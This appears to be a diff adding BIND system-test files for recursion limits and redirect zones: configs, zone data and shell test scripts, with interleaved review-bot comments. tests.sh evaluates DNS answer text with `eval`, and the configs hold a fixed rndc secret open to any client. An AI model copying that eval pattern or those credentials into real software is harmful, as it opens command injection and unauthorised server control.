+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ servfail-ttl 0;
+ qname-minimization disabled;
+ max-recursion-depth 100;
+ max-recursion-queries 50;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints.db"; };
diff --git a/bin/tests/system/reclimit/ns3/named4.conf.in b/bin/tests/system/reclimit/ns3/named4.conf.in
new file mode 100644
index 0000000..84b5f4b
--- /dev/null
+++ b/bin/tests/system/reclimit/ns3/named4.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ servfail-ttl 0;
+ qname-minimization disabled;
+ max-recursion-depth 100;
+ max-recursion-queries 40;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints.db"; };
diff --git a/bin/tests/system/reclimit/prereq.sh b/bin/tests/system/reclimit/prereq.sh
new file mode 100644
index 0000000..8c587c3
--- /dev/null
+++ b/bin/tests/system/reclimit/prereq.sh
@@ -0,0 +1,37 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION <= 0.78);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS versions up to 0.78 have a bug that causes this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+
+if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS::Nameserver library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/reclimit/setup.sh b/bin/tests/system/reclimit/setup.sh
new file mode 100644
index 0000000..5b39cdf
--- /dev/null
+++ b/bin/tests/system/reclimit/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
diff --git a/bin/tests/system/reclimit/tests.sh b/bin/tests/system/reclimit/tests.sh
new file mode 100644
index 0000000..7fe8ee9
--- /dev/null
+++ b/bin/tests/system/reclimit/tests.sh
@@ -0,0 +1,211 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=0 + +ns3_reset() { + copy_setports $1 ns3/named.conf + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} reconfig 2>&1 | sed 's/^/I:ns3 /' + $RNDC -c ../common/rndc.conf -s 10.53.0.3 -p ${CONTROLPORT} flush | sed 's/^/I:ns3 /' +} + +ns3_sends_aaaa_queries() { + if grep "started AAAA fetch" ns3/named.run >/dev/null; then + return 0 + else + return 1 + fi +} + +# Check whether the number of queries ans2 received from ns3 (this value is +# read from dig output stored in file $1) is as expected. The expected query +# count is variable: +# - if ns3 sends AAAA queries, the query count should equal $2, +# - if ns3 does not send AAAA queries, the query count should equal $3. 
+check_query_count() { + count1=`sed 's/[^0-9]//g;' $1` + count2=`sed 's/[^0-9]//g;' $2` + count=`expr $count1 + $count2` + #echo_i "count1=$count1 count2=$count2 count=$count" + expected_count_with_aaaa=$3 + expected_count_without_aaaa=$4 + + if ns3_sends_aaaa_queries; then + expected_count=$expected_count_with_aaaa + else + expected_count=$expected_count_without_aaaa + fi + + if [ $count -ne $expected_count ]; then + echo_i "count $count (actual) != $expected_count (expected)" + ret=1 + fi +} + +echo_i "set max-recursion-depth=12" + +n=`expr $n + 1` +echo_i "attempt excessive-depth lookup ($n)" +ret=0 +echo "1000" > ans2/ans.limit +echo "1000" > ans4/ans.limit +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect1.example.org > dig.out.1.test$n || ret=1 +grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 27 14 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "12" > ans2/ans.limit +echo "12" > ans4/ans.limit +ns3_reset ns3/named1.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect2.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 50 26 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=5" + +n=`expr $n + 1` +echo_i "attempt excessive-depth lookup ($n)" +ret=0 +echo "12" > 
ans2/ans.limit +ns3_reset ns3/named2.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect3.example.org > dig.out.1.test$n || ret=1 +grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 13 7 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "5" > ans2/ans.limit +echo "5" > ans4/ans.limit +ns3_reset ns3/named2.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect4.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +check_query_count dig.out.2.test$n dig.out.4.test$n 22 12 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=100, max-recursion-queries=50" + +n=`expr $n + 1` +echo_i "attempt excessive-queries lookup ($n)" +ret=0 +echo "13" > ans2/ans.limit +echo "13" > ans4/ans.limit +ns3_reset ns3/named3.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.4 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect5.example.org > dig.out.1.test$n || ret=1 +if ns3_sends_aaaa_queries; then + grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +fi +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.4 count txt > dig.out.4.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 
0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "12" > ans2/ans.limit +ns3_reset ns3/named3.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect6.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "set max-recursion-depth=100, max-recursion-queries=40" + +n=`expr $n + 1` +echo_i "attempt excessive-queries lookup ($n)" +ret=0 +echo "11" > ans2/ans.limit +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect7.example.org > dig.out.1.test$n || ret=1 +if ns3_sends_aaaa_queries; then + grep "status: SERVFAIL" dig.out.1.test$n > /dev/null || ret=1 +fi +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 40 ] || { ret=1; echo_i "count ($count) !<= 40"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempt permissible lookup ($n)" +ret=0 +echo "9" > ans2/ans.limit +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || ret=1 +$DIG $DIGOPTS @10.53.0.3 indirect8.example.org > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -le 40 ] || { ret=1; echo_i "count ($count) !<= 40"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "attempting NS explosion ($n)" +ret=0 +ns3_reset ns3/named4.conf.in +$DIG $DIGOPTS @10.53.0.2 reset > /dev/null || 
ret=1 +$DIG $DIGOPTS +short @10.53.0.3 ns1.1.example.net > dig.out.1.test$n || ret=1 +$DIG $DIGOPTS +short @10.53.0.2 count txt > dig.out.2.test$n || ret=1 +eval count=`cat dig.out.2.test$n` +[ $count -lt 50 ] || ret=1 +$DIG $DIGOPTS +short @10.53.0.7 count txt > dig.out.3.test$n || ret=1 +eval count=`cat dig.out.3.test$n` +[ $count -lt 50 ] || { ret=1; echo_i "count ($count) !<= 50"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +#grep "duplicate query" ns3/named.run +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/redirect/clean.sh b/bin/tests/system/redirect/clean.sh new file mode 100644 index 0000000..9489c94 --- /dev/null +++ b/bin/tests/system/redirect/clean.sh @@ -0,0 +1,38 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */named.stats +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns1/K* +rm -f ns1/dsset-nsec3. +rm -f ns1/dsset-signed. +rm -f ns1/nsec3.db* +rm -f ns1/signed.db* +rm -f ns2/*.db +rm -f ns3/K* +rm -f ns3/dsset-nsec3. +rm -f ns3/dsset-signed. +rm -f ns3/nsec3.db* +rm -f ns3/signed.db* +rm -f ns4/*.db +rm -f ns5/dsset-* +rm -f ns5/K* ns5/sign.ns5.* +rm -f ns5/root.db ns5/root.db.signed +rm -f ns5/signed.db ns5/signed.db.signed +rm -f ns6/signed.db.signed +rm -f rndc.out +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/redirect/conf/bad1.conf b/bin/tests/system/redirect/conf/bad1.conf new file mode 100644 index 0000000..5ff4fee --- /dev/null +++ b/bin/tests/system/redirect/conf/bad1.conf 
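Review bot: In tests.sh, the `eval count=...` lines in the four max-recursion-queries tests and in the NS explosion test pass the text of a DNS answer to the shell for evaluation, although `check_query_count` earlier in the same file already extracts the number with `sed 's/[^0-9]//g;'`. The eval is presumably there to strip the quotes that `dig +short` prints around a TXT string, but it also executes anything else that ends up in the output file. `count=$(sed 's/[^0-9]//g;' dig.out.2.test$n)` yields the same number without evaluating the response, and the same applies to the `dig.out.3.test$n` read in the last test. Separately, the final check tests `-lt 50` but its message reports `!<= 50`.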
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+ allow-query { 10.0.1.0; };
+/* option 'forwarders' is not allowed in 'redirect' zone '.' */
+ forwarders { 1.2.3.4; };
+};
diff --git a/bin/tests/system/redirect/conf/bad2.conf b/bin/tests/system/redirect/conf/bad2.conf
new file mode 100644
index 0000000..0cf0a68
--- /dev/null
+++ b/bin/tests/system/redirect/conf/bad2.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+ allow-query { 10.0.1.0; };
+/* option 'also-notify' is not allowed in 'redirect' zone '.' */
+ also-notify { 1.2.3.4; };
+};
diff --git a/bin/tests/system/redirect/conf/bad3.conf b/bin/tests/system/redirect/conf/bad3.conf
new file mode 100644
index 0000000..b034c5b
--- /dev/null
+++ b/bin/tests/system/redirect/conf/bad3.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+/* redirect zones must be called "." */
+zone "x" {
+ type redirect;
+ file "redirect.db";
+ allow-query { 10.0.1.0; };
+};
diff --git a/bin/tests/system/redirect/conf/good1.conf b/bin/tests/system/redirect/conf/good1.conf
new file mode 100644
index 0000000..c5711e5
--- /dev/null
+++ b/bin/tests/system/redirect/conf/good1.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+};
diff --git a/bin/tests/system/redirect/conf/good2.conf b/bin/tests/system/redirect/conf/good2.conf
new file mode 100644
index 0000000..156995b
--- /dev/null
+++ b/bin/tests/system/redirect/conf/good2.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type master;
+ file "master.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+};
diff --git a/bin/tests/system/redirect/conf/good3.conf b/bin/tests/system/redirect/conf/good3.conf
new file mode 100644
index 0000000..dcdd954
--- /dev/null
+++ b/bin/tests/system/redirect/conf/good3.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type secondary;
+ file "sec.db";
+ primaries { 1.2.3.4; };
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+};
diff --git a/bin/tests/system/redirect/conf/good4.conf b/bin/tests/system/redirect/conf/good4.conf
new file mode 100644
index 0000000..e046577
--- /dev/null
+++ b/bin/tests/system/redirect/conf/good4.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ file "hint.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+ allow-query { 10.0.1.0; };
+};
diff --git a/bin/tests/system/redirect/ns1/example.db b/bin/tests/system/redirect/ns1/example.db
new file mode 100644
index 0000000..90c09d4
--- /dev/null
+++ b/bin/tests/system/redirect/ns1/example.db
@@ -0,0 +1,50 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 marka.isc.org. 0 0 0 0 1200
+@ NS ns1
+ns1 A 10.53.0.1
+excluded-good-a AAAA 2001:eeee::1
+ A 1.2.3.4
+excluded-bad-a AAAA 2001:eeee::2
+ A 10.0.0.1
+excluded-only AAAA 2001:eeee::3
+partially-excluded-good-a AAAA 2001:eeee::1
+ AAAA 2001::1
+ A 1.2.3.4
+partially-excluded-bad-a AAAA 2001:eeee::2
+ AAAA 2001::2
+ A 10.0.0.1
+partially-excluded-only AAAA 2001:eeee::3
+ AAAA 2001::3
+a-only A 1.2.3.5
+a-and-aaaa AAAA 2001::1
+ A 1.2.3.6
+aaaa-only AAAA 2001::2
+a-not-mapped A 10.0.0.2
+mx-only MX 10 ns.example.
+cname-excluded-good-a CNAME excluded-good-a
+cname-excluded-bad-a CNAME excluded-bad-a
+cname-excluded-only CNAME excluded-only
+cname-partial-excluded-good-a CNAME partial-excluded-good-a
+cname-partial-excluded-bad-a CNAME partial-excluded-bad-a
+cname-partial-excluded-only CNAME partial-excluded-only
+cname-a-only CNAME a-only
+cname-a-and-aaaa CNAME a-and-aaaa
+cname-aaaa-only CNAME aaaa-only
+cname-a-not-mapped CNAME a-not-mapped
+cname-mx-only CNAME mx-only
+cname-non-existent CNAME non-existent
+ttl-less-than-600 500 A 5.6.7.8
+ttl-more-than-600 700 A 5.6.7.8
+ttl-less-than-minimum 1100 A 5.6.7.8
+ttl-more-than-minimum 1300 A 5.6.7.8
diff --git a/bin/tests/system/redirect/ns1/named.conf.in b/bin/tests/system/redirect/ns1/named.conf.in
new file mode 100644
index 0000000..412b874
--- /dev/null
+++ b/bin/tests/system/redirect/ns1/named.conf.in
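Review bot: The records `cname-partial-excluded-good-a`, `cname-partial-excluded-bad-a` and `cname-partial-excluded-only` in ns1/example.db point at `partial-excluded-*`, but the owner names defined earlier in the zone are `partially-excluded-*`, so these three CNAMEs have no target. The zone already has `cname-non-existent` for the dangling-alias case, so this looks unintended; the targets would then read e.g. `cname-partial-excluded-good-a CNAME partially-excluded-good-a`. If the dangling targets are deliberate, a `;` comment saying so would prevent a later "fix". ns3/example.db further down carries the same three lines.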
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ allow-recursion { 10.53.0.1; };
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "signed" {
+ type primary;
+ file "signed.db.signed";
+};
+
+zone "nsec3" {
+ type primary;
+ file "nsec3.db.signed";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+ allow-query { !10.53.0.2; !10.53.0.4; any; };
+};
+
+// include "trusted.conf";
diff --git a/bin/tests/system/redirect/ns1/redirect.db b/bin/tests/system/redirect/ns1/redirect.db
new file mode 100644
index 0000000..b2a60bb
--- /dev/null
+++ b/bin/tests/system/redirect/ns1/redirect.db
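Review bot: In ns1/named.conf.in, `acl rfc1918 { 10/8; 192.168/16; 172.16/12; };` is defined but no statement in the file refers to it, and the last line `// include "trusted.conf";` is commented out while `dnssec-validation yes;` is set. With the include disabled the file configures no trust anchor of its own, so it is worth confirming that validation is not something the test relies on for this server. Either remove the two leftovers or add a short comment saying why they are kept. The ns2, ns3 and ns4 named.conf.in files of this test define the same unused acl.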
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0
+@ IN NS ns.example.net
+;
+; NS records do not need address records in this zone as it is not in the
+; normal namespace.
+;
+*. IN A 100.100.100.2
+*. IN AAAA 2001:ffff:ffff::100.100.100.2
diff --git a/bin/tests/system/redirect/ns1/root.db b/bin/tests/system/redirect/ns1/root.db
new file mode 100644
index 0000000..6df215f
--- /dev/null
+++ b/bin/tests/system/redirect/ns1/root.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+example NS ns1.example.
+ns1.example. A 10.53.0.1
+signed NS ns1.example.
+ns1.signed. A 10.53.0.1
diff --git a/bin/tests/system/redirect/ns1/sign.sh b/bin/tests/system/redirect/ns1/sign.sh
new file mode 100644
index 0000000..500dee6
--- /dev/null
+++ b/bin/tests/system/redirect/ns1/sign.sh
@@ -0,0 +1,37 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=signed
+infile=example.db
+zonefile=signed.db
+
+key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $zone)
+key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+zone=nsec3
+infile=example.db
+zonefile=nsec3.db
+
+key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone)
+key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -fk $zone)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -3 - -g -o $zone $zonefile > /dev/null
diff --git a/bin/tests/system/redirect/ns2/example.db.in b/bin/tests/system/redirect/ns2/example.db.in
new file mode 100644
index 0000000..a87ae7d
--- /dev/null
+++ b/bin/tests/system/redirect/ns2/example.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0
+@ NS ns2
+ns2 A 10.53.0.2
+a A 10.53.0.2
diff --git a/bin/tests/system/redirect/ns2/named.conf.in b/bin/tests/system/redirect/ns2/named.conf.in
new file mode 100644
index 0000000..9e8cbde
--- /dev/null
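Review bot: Error handling in ns1/sign.sh rests entirely on the `-e` in `#!/bin/sh -e`, which only takes effect when the file is executed directly. If the test setup starts it as an argument to a shell (the caller is not visible in this diff), a failed `$KEYGEN` leaves `key1` empty, `cat` tries to read `.key`, and `$SIGNER` still runs on the incomplete zone file. A `set -e` line after the license header makes the behaviour independent of how the script is launched. Quoting the expansions, e.g. `cat "$infile" "$key1.key" "$key2.key" > "$zonefile"`, would also keep the generated key file names intact. ns3/sign.sh below is the same blob (index 500dee6) and needs the same change.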
+++ b/bin/tests/system/redirect/ns2/named.conf.in
@@ -0,0 +1,57 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
